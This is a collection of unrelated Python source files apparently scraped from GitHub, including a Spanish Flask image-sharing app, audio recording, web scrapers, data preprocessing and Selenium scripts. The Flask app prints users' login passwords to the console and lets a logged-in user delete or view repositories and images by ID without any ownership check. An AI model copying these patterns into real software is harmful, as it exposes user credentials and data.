FLASK#\r\napp = Flask(__name__, static_folder = 'public/', static_url_path='/', template_folder='public/views')\r\napp.config.from_object(DevelopmentConfig)\r\n\r\n#SI OCURRE UN ERROR DE 404, SE ENVÍA UN MENSAJE AL USUARIO#\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n return \"Error 404. Recurso no encontrado.\"\r\n\r\n#PÁGINA PRINCIPAL DE LA APLICACIÓN#\r\n@app.route('/', methods = ['GET'])\r\ndef index():\r\n return render_template('index.html')\r\n\r\n#VALIDACIÓN DE RUTAS(VERIFICACIÓN DE SESIÓN)#\r\n\r\n@app.before_request\r\ndef ValidarSesion():\r\n if 'idU' not in session and request.endpoint not in ['index','Registro', 'InicioSesion', 'static']:\r\n print('No está en sesión.', request.endpoint);\r\n mensaje = \"No está autenticado. Por favor, inicie sesión pulsando el botón para iniciar sesión\"\r\n flash(mensaje)\r\n return redirect('/')\r\n\r\n@app.after_request\r\ndef SesionValidada(respuesta):\r\n return respuesta\r\n\r\n\r\n\r\n#FIN VALIDACIÓN DE RUTAS#\r\n\r\n#REGISTRO Y AUTENTICACIÓN DE USUARIOS EN LA APLICACIÓN#\r\n@app.route('/Registro',methods = ['GET', 'POST'])\r\ndef Registro():\r\n RegistroUF = Forms.FormularioRegistro(request.form)\r\n if request.method == 'POST' and RegistroUF.validate():\r\n Cuenta = Usuario.query.filter_by(email = RegistroUF.email.data).first()\r\n print(request.method, Cuenta)\r\n if Cuenta is None:\r\n\r\n #SE CREA EL NUEVO USUARIO SI TODOS LOS DATOS SON CORRECTOS.\r\n NuevoU = Usuario(nombre = RegistroUF.nombre.data,\r\n apellido = RegistroUF.apellido.data,\r\n email = RegistroUF.email.data,\r\n clave = RegistroUF.clave.data)\r\n\r\n BD.session.add(NuevoU)\r\n BD.session.commit()\r\n\r\n\r\n print(RegistroUF.email.data)\r\n mensaje = \"¡Su cuenta ha sido creada con éxito! Por favor, inicie sesión\"\r\n flash(mensaje)\r\n return redirect('/')\r\n\r\n else:\r\n mensaje = \"El email ingresado ya está en uso. Por favor, ingrese uno diferente.\"\r\n flash(mensaje)\r\n return redirect('/Registro')\r\n\r\n\r\n return render_template('Registro.html', form = RegistroUF)\r\n\r\n\r\n@app.route('/IniciarSesion', methods = ['GET', 'POST'])\r\ndef InicioSesion():\r\n FormularioInicioSesion = Forms.FormularioInicioS(request.form)\r\n\r\n if request.method == 'POST' and FormularioInicioSesion.validate():\r\n EmailU = FormularioInicioSesion.email.data\r\n ClaveU = FormularioInicioSesion.clave.data\r\n print(\"La clave que ingresó el usuario es: \", ClaveU)\r\n\r\n #SE VALIDAN LAS CREDENCIALES#\r\n\r\n Usuario_Sesion = Usuario.query.filter_by( email = EmailU).first()\r\n if Usuario_Sesion is not None and Usuario_Sesion.ValidarClave(ClaveU):\r\n session['idU'] = Usuario_Sesion.id\r\n session['email'] = EmailU\r\n session['nombre'] =Usuario_Sesion.nombre\r\n return redirect('/Inicio', )\r\n else:\r\n mensaje = \"Email o contraseña incorrectas, por favor, verifique sus datos.\"\r\n flash(mensaje)\r\n return redirect('/IniciarSesion')\r\n \r\n return render_template('InicioSesion.html', form = FormularioInicioSesion)\r\n\r\n@app.route('/Salir', methods = ['GET'])\r\ndef CerrarSesion():\r\n if 'email' in session:\r\n session.pop('email');\r\n session.pop('nombre');\r\n session.pop('idU');\r\n return redirect('/');\r\n\r\n#FIN DE REGISTRO Y AUTENTICACIÓN DE USUARIOS#\r\n\r\n\r\n#USUARIO Y CREACIÓN DE REPOSITORIOS-IMÁGENES\r\n\r\n@app.route('/Usuarios/VerPerfil')\r\ndef VerPerfil():\r\n return render_template('PerfilUsuario.html')\r\n\r\n#VISUALIZAR LOS DATOS DEL USUARIO#\r\n@app.route('/Usuarios/MostrarDatosU', methods = ['GET'])\r\ndef MostrarDatos():\r\n id_Usuario = session.get('idU')\r\n DatosUsuario = Usuario.query.filter_by(id = id_Usuario).first()\r\n ReposUsuario = Repositorio.query.filter_by(idUsuario = session.get('idU')).all()\r\n Repos_Usuario = []\r\n\r\n #SE UBICAN LOS REPOSITORIOS QUE SON PROPIEDAD DEL USUARIO#\r\n for repo in ReposUsuario:\r\n datos_repo = {\r\n \"idRepo\" : repo.idRepo,\r\n \"idUsuario\" : repo.idUsuario,\r\n \"nombre_repo\" : repo.nombre_repo\r\n }\r\n Repos_Usuario.append(datos_repo)\r\n \r\n return jsonify({\"estado\": 200, \"NombreU\": DatosUsuario.nombre, \"ApellidoU\": DatosUsuario.apellido, \"EmailU\": DatosUsuario.email, \"Repos\": Repos_Usuario}), 200\r\n\r\n#CREAR UN NUEVO REPOSITORIO#\r\n@app.route('/CrearRepositorio', methods = ['GET', 'POST'])\r\ndef DespachoFormularioCol():\r\n ColFormulario = Forms.FormularioRepositorios(request.form)\r\n\r\n if request.method == 'POST' and ColFormulario.validate():\r\n print('El nombre del repo es: ', ColFormulario.nombre.data)\r\n NuevoRepo = Repositorio(session.get('idU'), ColFormulario.nombre.data)\r\n BD.session.add(NuevoRepo)\r\n BD.session.commit()\r\n\r\n return redirect('/Usuarios/VerPerfil')\r\n\r\n return render_template('CrearRepositorio.html', form = ColFormulario)\r\n\r\n#VISUALIZAR UN REPOSITORIO ESPECÍFICO#\r\n@app.route('/VerRepositorio/<idR>', methods=['GET'])\r\ndef VerRepositorio(idR):\r\n print('el id del repositorio es: ', idR)\r\n\r\n DatosRepo = Repositorio.query.filter_by(idRepo = idR).first()\r\n ImagenesRepo = Imagen.query.filter_by(idRepo = idR).all()\r\n print('Las imagenes de este repositorio son: ', ImagenesRepo)\r\n\r\n imagenes_repo = []\r\n\r\n for i in ImagenesRepo:\r\n datosImagen = {\r\n \"idImagen\" : i.idImagen,\r\n \"idRepo\" : i.idRepo,\r\n \"nombre_img\" : i.nombre_img,\r\n \"autor\" : i.autor,\r\n \"tags\" : i.tags,\r\n \"url\" : i.url \r\n }\r\n imagenes_repo.append(datosImagen) \r\n \r\n print(imagenes_repo)\r\n Resultado = {\r\n \"nombre_repo\" : DatosRepo.nombre_repo,\r\n \"idRepo\" : DatosRepo.idRepo,\r\n \"idUsuario\" : DatosRepo.idUsuario,\r\n \"imagenes\" : imagenes_repo\r\n }\r\n \r\n print(Resultado)\r\n return render_template('VerRepo.html', datos = Resultado, emailUsuario = session.get('email'), nombreUsuario = session.get('nombre'))\r\n\r\n#ELIMINAR UN REPOSITORIO#\r\n@app.route('/BorrarRepositorio/<id>', methods = ['DELETE'])\r\ndef BorrarRepositorio(id):\r\n print(id)\r\n Repo = Repositorio.query.filter_by(idRepo = id).first()\r\n BD.session.delete(Repo)\r\n BD.session.commit()\r\n return \"Ok\"\r\n\r\n#AGREGAR IMÁGENES A UN REPOSITORIO#\r\n@app.route('/AgregarImagen/<idRepo>', methods = ['GET', 'POST'])\r\ndef AgregarImagen(idRepo):\r\n print(idRepo)\r\n \r\n \r\n if request.method == 'POST':\r\n print('Creando imagen...')\r\n #SE OBTIENE LA RUTA DEL ARCHIVO PARA GUARDARLA EN LA BD, Y SE ALMACENA EL ARCHIVO EN LA CARPETA#\r\n archivo = request.files['file']\r\n archivo.save(os.getcwd() + \"/public/assets/imagenes/\" + secure_filename(archivo.filename))\r\n url = \"/assets\"+\"/imagenes/\"+archivo.filename\r\n Nueva_img = Imagen(idRepo, request.form['titulo'], session.get('nombre'), url, request.form['tags'])\r\n #SE AGREGA LA IMAGEN CREADA A LA COLECCIÓN CORRESPONDIENTE#\r\n BD.session.add(Nueva_img)\r\n BD.session.commit()\r\n return redirect('/VerRepositorio/'+idRepo)\r\n\r\n return render_template('NuevaImagen.html', idRepo = idRepo)\r\n\r\n#ELIMINAR UNA IMAGEN#\r\n#SE REALIZA CON EL MÉTODO HTTP - GET PARA AHORRO DE ESCRITURA DE RUTAS#\r\n@app.route('/BorrarImagen/<id>', methods = ['GET'])\r\ndef BorrarImagen(id):\r\n print(id)\r\n BImagen = Imagen.query.filter_by(idImagen = id).first()\r\n BD.session.delete(BImagen)\r\n BD.session.commit()\r\n mensaje = \"La imagen ha sido borrada con éxito. Revise el repositorio pertinente para agregar nuevas imágenes.\"\r\n flash(mensaje)\r\n return redirect('/Usuarios/VerPerfil')\r\n\r\n#BÚSQUEDA DE PUBLICACIONES POR MEDIO DE LAS ETIQUETAS#\r\n@app.route('/ResultadosBusqueda/<Datos>', methods = ['GET'])\r\ndef ResultadosBusqueda(Datos):\r\n print(Datos)\r\n\r\n Resultados = Imagen.query.filter_by(tags = Datos).all()\r\n RespuestaBusqueda = []\r\n for imagen in Resultados:\r\n datos_imagen = {\r\n \"idImagen\" : imagen.idImagen,\r\n \"idRepo\" : imagen.idRepo,\r\n \"nombre_img\" : imagen.nombre_img,\r\n \"autor\" : imagen.autor,\r\n \"tags\" : imagen.tags,\r\n \"url\" : imagen.url\r\n }\r\n RespuestaBusqueda.append(datos_imagen)\r\n \r\n return render_template('Busqueda.html', imagen = RespuestaBusqueda, emailUsuario = session.get('email'), nombreUsuario = session.get('nombre') )\r\n\r\n#EDICIÓN DE USUARIOS#\r\n@app.route('/Usuarios/Editar', methods = ['GET'])\r\ndef Editar():\r\n FormularioEdicion = Forms.FormularioRegistro(request.form)\r\n\r\n return render_template('EditarUsuario.html', form = FormularioEdicion)\r\n\r\n@app.route('/Usuarios/EditarU', methods = ['PUT'])\r\ndef EditarU():\r\n FormularioEdicion = Forms.FormularioRegistro(request.form)\r\n print(FormularioEdicion.email.data)\r\n usuario = Usuario.query.filter_by(id = session.get('idU')).first()\r\n usuario.nombre = FormularioEdicion.nombre.data\r\n usuario.apellido = FormularioEdicion.apellido.data\r\n usuario.email = FormularioEdicion.email.data\r\n usuario.clave = FormularioEdicion.clave.data\r\n session['idU'] = usuario.id\r\n session['email'] = usuario.email\r\n session['nombre'] = usuario.nombre\r\n\r\n BD.session.commit()\r\n\r\n\r\n return \"Ok\"\r\n\r\n#ELIMINAR USUARIO#\r\n@app.route('/Usuarios/Borrar', methods = ['DELETE'])\r\ndef Borrar():\r\n BorrarUsuario = Usuario.query.filter_by(email = session.get('email')).first()\r\n BD.session.delete(BorrarUsuario)\r\n BD.session.commit()\r\n mensaje = \"Su cuenta ha sido eliminada con éxito.\"\r\n flash(mensaje)\r\n return \"Su cuenta ha sido eliminada con éxito.\"\r\n\r\n\r\n#DESPACHO DEL INICIO DE LA APLICACIÓN UNA VEZ AUTENTICADO#\r\n\r\n@app.route('/Inicio', methods = ['GET'])\r\ndef DespachoInicio():\r\n UsuarioIdentificado = session.get('email')\r\n a = session.get('nombre')\r\n #BUSCAR TODAS LAS PUBLICACIONES#\r\n publicaciones = Imagen.query.all()\r\n Posts = []\r\n for i in publicaciones:\r\n datosImagen = {\r\n \"idImagen\" : i.idImagen,\r\n \"idRepo\" : i.idRepo,\r\n \"nombre_img\" : i.nombre_img,\r\n \"autor\" : i.autor,\r\n \"tags\" : i.tags,\r\n \"url\" : i.url \r\n }\r\n Posts.append(datosImagen)\r\n\r\n\r\n return render_template('InicioDupic.html', emailUsuario = UsuarioIdentificado, nombreUsuario = a, imagenes = Posts)\r\n\r\n\r\n###########################################################\r\n\r\nBD.init_app(app)\r\n\r\n\r\n# Iniciar servidor (ejecutar)\r\nif __name__ == '__main__':\r\n\r\n with app.app_context():\r\n BD.create_all()\r\n \r\n GenerarDirectorio()\r\n app.run()","repo_name":"CarlosV06/Dupic-webii","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11415,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2349990237","text":"from __future__ import annotations\nimport settings\nimport pyaudio\nimport wave\nimport collections\nimport math\nimport audioop\n\n\nclass AudioInput():\n\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n SAMPLE_RATE = 44100\n CHUNK_SIZE = 1024\n\n DEFAULT_RECORD_SECONDS = 5\n DEFAULT_WAVE_OUTPUT_FILENAME = settings.APP_USER_VOCAL_FILE\n\n def __init__(self, is_verbose=True):\n self.audio = pyaudio.PyAudio()\n self.is_verbose = is_verbose\n self.energy_threshold = 3500 # minimum audio energy to consider for recording\n self.pause_threshold = 2 # seconds of quiet time before a phrase is considered complete\n self.quiet_duration = 1 # amount of quiet time to keep on both sides of the recording\n\n def uses_audio_stream(function):\n \"\"\"\n Decorator function that initializes the `self.audio_stream` attribute on\n an instance of `AudioInput` and then closes it afterwards.\n \"\"\"\n def wrapper(self, *args, **kwargs):\n self.audio_stream = self.audio.open(\n frames_per_buffer=self.CHUNK_SIZE,\n channels=self.CHANNELS,\n rate=self.SAMPLE_RATE,\n format=self.FORMAT,\n input=True)\n value = function(self, *args, **kwargs)\n self.audio_stream.stop_stream()\n self.audio_stream.close()\n self.audio_stream = None\n return value\n return wrapper\n\n @uses_audio_stream\n def calibrate_mic(self, calibration_seconds=10, top_percent_to_average=.05) -> None:\n \"\"\"\n Set the `AudioInput`'s `energy_threshold` to the average energy\n recorded during calibration.\n \"\"\"\n if self.is_verbose:\n print(f'* Calibrating microphone (for {calibration_seconds} seconds.)')\n \n # Save the audio energies over a period of time\n energies = []\n sample_width = pyaudio.get_sample_size(self.FORMAT)\n frames_per_second = frames_per_second = self.SAMPLE_RATE / self.CHUNK_SIZE\n num_frames = int(frames_per_second * calibration_seconds)\n for _ in range(0, num_frames):\n data = self.audio_stream.read(self.CHUNK_SIZE)\n energy = audioop.rms(data, sample_width)\n energies.append(energy)\n\n # Grab the highest energies as a percent of total energies\n energies = sorted(energies, reverse=True)\n top_n_population = int(len(energies) * top_percent_to_average)\n highest_energies = energies[:top_n_population]\n \n average_energy = sum(highest_energies) / len(highest_energies)\n self.energy_threshold = average_energy\n\n if self.is_verbose:\n print(f'* Finished calibration (average energy is {average_energy}).')\n \n\n @uses_audio_stream\n def listen(self, timeout=None) -> bytes:\n \"\"\"\n TODO\n \"\"\"\n # record audio data as raw samples\n frames = collections.deque()\n assert self.pause_threshold >= self.quiet_duration >= 0\n sample_width = pyaudio.get_sample_size(self.FORMAT)\n seconds_per_buffer = (self.CHUNK_SIZE + 0.0) / self.SAMPLE_RATE\n pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of quiet audio before the phrase is complete\n quiet_buffer_count = int(math.ceil(self.quiet_duration / seconds_per_buffer)) # maximum number of buffers of quiet audio to retain before and after\n elapsed_time = 0\n\n if self.is_verbose:\n print('* Listening for input...')\n\n # store audio input until the phrase starts\n while True:\n elapsed_time += seconds_per_buffer\n if timeout and elapsed_time > timeout: # handle timeout if specified\n raise TimeoutError(\"listening timed out\")\n\n buffer = self.audio_stream.read(self.CHUNK_SIZE)\n if len(buffer) == 0: break # reached end of the stream\n frames.append(buffer)\n\n # check if the audio input has stopped being quiet\n energy = audioop.rms(buffer, sample_width) # energy of the audio signal\n if energy > self.energy_threshold:\n break\n\n if len(frames) > quiet_buffer_count: # ensure we only keep the needed amount of quiet buffers\n frames.popleft()\n \n if self.is_verbose:\n print('* Recording phrase...')\n\n # read audio input until the phrase ends\n pause_count = 0\n while True:\n buffer = self.audio_stream.read(self.CHUNK_SIZE)\n if len(buffer) == 0: break # reached end of the stream\n frames.append(buffer)\n\n # check if the audio input has gone quiet for longer than the pause threshold\n energy = audioop.rms(buffer, sample_width) # energy of the audio signal\n if energy > self.energy_threshold * 0.9:\n pause_count = 0\n else:\n pause_count += 1\n if pause_count > pause_buffer_count: # end of the phrase\n break\n\n if self.is_verbose:\n print('* End of phrase.')\n\n # obtain frame data\n for i in range(quiet_buffer_count, pause_count): frames.pop() # remove extra quiet frames at the end\n frame_data = b\"\".join(list(frames))\n\n return frame_data\n\n @uses_audio_stream\n def record(self, record_seconds=DEFAULT_RECORD_SECONDS) -> bytes:\n \"\"\"\n Record audio for a pre-determined amount of time and return bytes.\n \"\"\"\n \n # Print start message\n if self.is_verbose:\n print('* Recording...')\n\n # Append bytes in the stream to a list of bytes in memory\n frame_accumulator = []\n frames_per_second = self.SAMPLE_RATE / self.CHUNK_SIZE\n num_frames = int(frames_per_second * record_seconds)\n for _ in range(0, num_frames):\n data = self.audio_stream.read(self.CHUNK_SIZE)\n frame_accumulator.append(data)\n \n # Print end message\n if self.is_verbose:\n print('* Finished recording.')\n \n # Concat all bytes in the list and return bytes\n return b''.join(frame_accumulator)\n\n def save_bytes_to_wav_file(self, bytes, filename=DEFAULT_WAVE_OUTPUT_FILENAME) -> None:\n \"\"\"\n The side-effect of this function is to save bytes to a .wav file.\n \"\"\"\n waveFile = wave.open(filename, 'wb')\n waveFile.setnchannels(self.CHANNELS)\n waveFile.setsampwidth(self.audio.get_sample_size(self.FORMAT))\n waveFile.setframerate(self.SAMPLE_RATE)\n waveFile.writeframes(bytes)\n waveFile.close()\n\n def record_and_save(\n self, \n record_seconds=DEFAULT_RECORD_SECONDS, \n filename=DEFAULT_WAVE_OUTPUT_FILENAME) -> AudioInput:\n \"\"\"\n The side-effect of this function is to record audio and save it as a .wav file.\n This function returns this object for further operations.\n \"\"\"\n bytes = self.record()\n self.save_bytes_to_wav_file(bytes, filename)\n return self\n\n def listen_and_save(\n self, \n timeout=None, \n filename=DEFAULT_WAVE_OUTPUT_FILENAME) -> AudioInput:\n \"\"\"\n The side-effect of this function is to record audio and save it as a .wav file.\n This function returns this object for further operations.\n \"\"\"\n bytes = self.listen(timeout=timeout)\n self.save_bytes_to_wav_file(bytes, filename)\n return self\n \n def shutdown(self) -> None:\n \"\"\"\n Terminate PyAudio instance to free-up system resources.\n \"\"\"\n self.audio.terminate()\n","repo_name":"dodobird181/openai-art-exhibit","sub_path":"audio/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":7707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70394821882","text":"from intcode import IntcodeVm\r\n\r\ndef get_input():\r\n with open('../data/25.txt', 'r') as f:\r\n for line in f:\r\n return list(map(int, line.split(',')))\r\n\r\nMAIN_PROGRAM = get_input()\r\n\r\ndef play_game():\r\n vm = IntcodeVm(MAIN_PROGRAM)\r\n while True:\r\n while True:\r\n try:\r\n char = next(vm.outputs)\r\n if char is None: break\r\n print(chr(char), end='')\r\n except StopIteration:\r\n return\r\n command = input('Enter command: ')\r\n for char in command + '\\n':\r\n vm.send(ord(char))\r\n\r\nplay_game()\r\n","repo_name":"feadoor/advent-of-code-2019","sub_path":"python/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25146279566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 20 09:39:43 2021\n\n@author: lzt68\n\"\"\"\n\n#%% read the data\nimport pandas as pd\nimport numpy as np\ndata=pd.read_csv(\"bank-full.csv\",sep=';',engine=\"python\")\n\n#%% add year\ndata['year'] = np.zeros(data.shape[0])\nyear_counter = 2008\nii = 0\nwhile ii <= data.shape[0] - 1:\n if data['month'].iloc[ii] != 'jan':\n data['year'].iloc[ii] = year_counter\n ii = ii + 1 \n else:\n year_counter = year_counter + 1\n for jj in range(ii, data.shape[0]):\n if data['month'].iloc[jj] == 'jan':\n data['year'].iloc[jj] = year_counter\n else:\n ii = jj\n break\n \n#%% add timestamp\ndata['month'].replace({\"jan\": \"01\", \"feb\": \"02\", \"mar\": \"03\",\n \"apr\": \"04\", \"may\": \"05\", \"jun\": \"06\",\n \"jul\": \"07\", \"aug\": \"08\", \"sep\": \"09\",\n \"oct\": \"10\", \"nov\": \"11\", \"dec\": \"12\"},\n inplace = True)\n\ndata['year'] = data['year'].astype(int).astype(str)\ndata['day'] = data['day'].astype(str)\n\ndata['timestamp'] = data.apply(lambda x: x['day'] + \"-\" + x['month'] + \"-\" + x['year'], axis=1)\ndata['timestamp'] = pd.to_datetime(data['timestamp'], format=\"%d-%m-%Y\")\n\n#%% match timestamp to weekday\ndata['weekday'] = data['timestamp'].dt.dayofweek\ndata.head()\n\n#%% export the data\ndata.to_csv(\"bank-full-add_timestamp.csv\", index = False)","repo_name":"lzt68/2021-DSA5101-Machine-Learning-Project","sub_path":"Data Exploration and Preprocssing/Preprocessing_Add_Year_Timestamp.py","file_name":"Preprocessing_Add_Year_Timestamp.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38094113120","text":"import scrapy\nfrom ..items import QuotesItem\n\n\nclass Spider(scrapy.Spider):\n name = \"homes\"\n pno = 60\n start_urls = [\"https://www.99acres.com/rent-property-in-bangalore-east-ffid-page-6\"]\n\n def parse(self, response):\n items = QuotesItem()\n\n all_div_houses = response.css(\"div.oldSrp\")\n for houses in all_div_houses:\n p = houses.css(\".margin\\:0::text\").extract()\n t = houses.css(\"a::text\").extract()\n l = houses.css(\".srpttl a\").xpath(\"@href\").extract()\n a = houses.css(\".topActions+ span b::text\").extract()\n s = houses.css(\".doElip b::text\").extract()\n d = houses.css(\".wBr > span::text\").extract()\n f = houses.css(\".fcInit i\").xpath(\"@value\").extract()\n\n if p != []:\n price = p[0].strip()\n else:\n price = ''\n\n if t != []:\n title = t[0].strip()\n else:\n title = ''\n\n if a != []:\n area = a[0].strip()\n else:\n area = ''\n\n if s != []:\n society = s[0].strip()\n else:\n society = ''\n\n if l != []:\n link = l[0].strip()\n else:\n link = ''\n\n features = ''\n for i in f:\n features = features + i + \", \"\n features = features[:len(features) - 2]\n\n description = ''\n for i in d:\n if i != '... ':\n description += i\n\n items[\"price\"] = price\n items[\"title\"] = title\n items[\"link\"] = link\n items[\"area\"] = area\n items[\"society\"] = society\n items[\"description\"] = description\n items[\"features\"] = features\n\n yield items\n\n next_page = \"https://www.99acres.com/rent-property-in-bangalore-east-ffid-page-\"+str(Spider.pno)\n if Spider.pno <= 262:\n Spider.pno += 1\n yield response.follow(next_page, callback = self.parse)","repo_name":"JerinFrancisA/Scrapy-99acres","sub_path":"Quotes/spiders/homes.py","file_name":"homes.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37492317080","text":"import re\nfrom zenrows import ZenRowsClient\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\nimport nltk\nfrom nltk import word_tokenize, pos_tag\nfrom collections import Counter\nimport csv\n\n# Download NLTK data (if not already downloaded)\nnltk.download(\"punkt\")\nnltk.download(\"averaged_perceptron_tagger\")\n\n# Initialize the ZenRowsClient with your API key and parameters\n# IMPORTANT! Obtain API KEY here (https://app.zenrows.com/)\nzenrows_client = ZenRowsClient(\"API_KEY\")\n\n# Define the URL of the webpage to scrape using ZenRows\nbase_url = \"https://bestcompany.com/health-insurance/company/oscar?page={page}#reviews\"\n\n# Define parameters for ZenRows request\nparams = {\"autoparse\": \"true\"}\n\n# Define the number of pages to scrape\nnum_pages = 15 # Change this to the desired number of pages\n\n# Create an empty list to store all adjectives across all pages\nall_adjectives = []\n\n# Iterate through the specified number of pages\nfor page_number in range(1, num_pages + 1):\n # Construct the full URL for the current page\n current_url = base_url.format(page=page_number)\n\n # Use ZenRows to fetch the webpage content with autoparsing\n zenrows_response = zenrows_client.get(current_url, params=params)\n\n # Check if ZenRows response contains text content\n if not zenrows_response.text:\n # No more pages or error occurred, exit the loop\n break\n\n # Get the webpage content from ZenRows response\n webpage_content = zenrows_response.text\n\n # Remove symbols and punctuation\n webpage_content = re.sub(r'[^\\w\\s]', '', webpage_content)\n\n # Tokenize the cleaned text into words\n words = word_tokenize(webpage_content)\n\n # Perform part-of-speech tagging to identify adjectives\n tagged_words = pos_tag(words)\n\n # Define a list of generic adjectives to exclude\n exclude_adjectives = [\"much\", \"type\", \"url\", \"next\", \"great\", \"good\", \"many\", \"sure\", \"same\", \"different\", \"able\", \"other\", \"itemreviewed\", \"ratingvalue\", \"medical\"]\n\n # Filter only adjectives (JJ) from the tagged words and exclude generic adjectives\n adjectives = [word for word, tag in tagged_words if tag == \"JJ\" and word.lower() not in exclude_adjectives]\n\n # Append the adjectives from the current page to the list\n all_adjectives.extend(adjectives)\n\n# Create a word frequency count of adjectives across all pages\nadjective_counts = Counter(all_adjectives)\n\n# Get the top 100 adjectives with their frequencies\ntop_100_adjectives = adjective_counts.most_common(100)\n\n# Create a WordCloud with frequencies\nwordcloud = WordCloud(\n width=800,\n height=400,\n background_color=\"white\",\n # Pass the dictionary of word frequencies as input\n prefer_horizontal=1.0, # Controls the direction of words\n)\nwordcloud.generate_from_frequencies(dict(top_100_adjectives)) # Use word frequencies\n\n# Display the WordCloud\nplt.figure(figsize=(10, 5))\nplt.imshow(wordcloud, interpolation=\"bilinear\")\nplt.axis(\"off\")\nplt.title(\"Oscar Health's Top 100\")\nplt.show()\n\n# Export top 100 words and their frequencies to a CSV file\nwith open(\"top_100_adjectives.csv\", \"w\", newline=\"\") as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_writer.writerow([\"Word\", \"Frequency\"])\n for word, frequency in top_100_adjectives:\n csv_writer.writerow([word, frequency])\n\n\n","repo_name":"chrischang0726/demo-repo","sub_path":"oscar_health_customercomments.py","file_name":"oscar_health_customercomments.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74023152119","text":"\"\"\" Utility to load public keys (PEM) into redis for use with the cactuscoinapi.\n\"\"\"\nimport sys\nimport argparse\nimport logging\nimport redis\nimport pathlib\n\nLOGGING_FORMAT = \"%(message)s\"\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n\n p = argparse.ArgumentParser(description=__doc__)\n p.add_argument(\"--redis-server\", '-H', default='localhost', help='Redis server to connect to.')\n p.add_argument(\"--redis-port\", '-p', default=6379, help='Port to use with redis server.')\n p.add_argument(\"pubkeyfile\", nargs=\"+\", help='')\n\n args = p.parse_args(argv)\n fmt = LOGGING_FORMAT\n\n \"\"\"\n if args.verbose == 1:\n logging.basicConfig(level=logging.INFO, format=fmt)\n elif args.verbose == 2:\n logging.basicConfig(level=logging.DEBUG, format=fmt)\n else:\n logging.basicConfig(level=logging.WARNING, format=fmt)\n \"\"\"\n\n logger = logging.getLogger()\n\n r = redis.Redis(host=args.redis_server, port=args.redis_port)\n \n for keyfilepath in args.pubkeyfile:\n badge_num = int(pathlib.Path(keyfilepath).name)\n with open(keyfilepath, 'r') as key_file:\n r.hset('badge_keys', badge_num, key_file.read())\n\n return 0\n\nif __name__ == \"__main__\":\n sys.exit(main())\n\n","repo_name":"erikwilson/CactusCon7","sub_path":"badge/api/utils/load_keys.py","file_name":"load_keys.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"15955507268","text":"#coding:utf-8\n\n\nfrom\tDBTools\timport\tDBTools\n\n\n\n\n\n\n#### --- Получение списка цен ---\ndef GetListCost(mate_kod):\n db = DBTools()\n cr=db.cnx.cursor()\n cr.execute(\"SELECT * FROM mr_show_cost WHERE mate_kod=%s;\" % (mate_kod))\n db.cnx.commit()\n result = cr.fetchall()\n cr.close()\n db.Destroy()\n return result\n\n\n\n\n\n\n#### --- Добавление цены ---\ndef NewCostMate(db,mate_kod,date,cost):\n cost = cost.encode(\"utf-8\")\n cr=db.cnx.cursor()\n cr.execute(\"SELECT mr_AddNewCost(%s,'%s',%s)\" % (mate_kod,date,cost))\n db.cnx.commit()\n result = cr.fetchone()\n cr.close()\n return result[0]\n\n\n\n\n\n\n#### --- Удаление цены ---\ndef DelCostMate(cost_kod):\n db = DBTools()\n cr=db.cnx.cursor()\n cr.execute(\"SELECT mr_DelCost('%s')\" % (cost_kod))\n db.cnx.commit()\n result = cr.fetchone()\n cr.close()\n db.Destroy()\n return result[0]\n","repo_name":"v-komarov/psv3","sub_path":"mr/RunSQLPage3.py","file_name":"RunSQLPage3.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41660517809","text":"#coding='utf-8'\nfrom time import sleep\nfrom selenium import webdriver\n\nfrom testpage import addtree\n\n#定义浏览器\n# driver=webdriver.Chrome()\n# #打开页面\n# driver.get(\"file:///C:/Users/%E5%88%98%E6%9C%8B%E5%BC%BA/Desktop/alert.html\")\n# #定位提示弹窗按钮\n# l=driver.find_element_by_id(\"2\")\n# #点击按钮\n# l.click()\n# #等待\n# sleep(1)\n# # #操作弹窗\n# w=driver.switch_to.alert\n# #获取弹窗提示信息\n# text=w.text\n# # #打印提示信息\n# print(\"弹窗提示信息是:%s\"%text)\n# # #点击确定按钮\n# w.accept()\n# sleep(1)\n# #关闭\n# driver.quit()\n\n#定义浏览器,并打开页面\ndriver=addtree.getDriver(addtree.baidu)\n#定位提示弹窗按钮\nl=driver.find_element_by_id(\"2\")\n#点击按钮\nl.click()\n#等待\nsleep(1)\n# #操作弹窗\nw=driver.switch_to.alert\n#获取弹窗提示信息\ntext=w.text\n# #打印提示信息\nprint(\"弹窗提示信息是:%s\"%text)\n# #点击确定按钮\nw.accept()\nsleep(1)\n#获取浏览器信息\nhello=driver.find_element_by_css_selector(\"[align='center']>h4\")\nprint(\"浏览器页面信息:%s\"%hello.text)\n\n#关闭\ndriver.quit()\n","repo_name":"Jinghua123456/yueying","sub_path":"webAutoProject/testpage/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16780498081","text":"#coding:utf-8\nimport requests\nimport pymongo\nimport time\nimport json\nimport random\nimport pandas as pd\n\n# 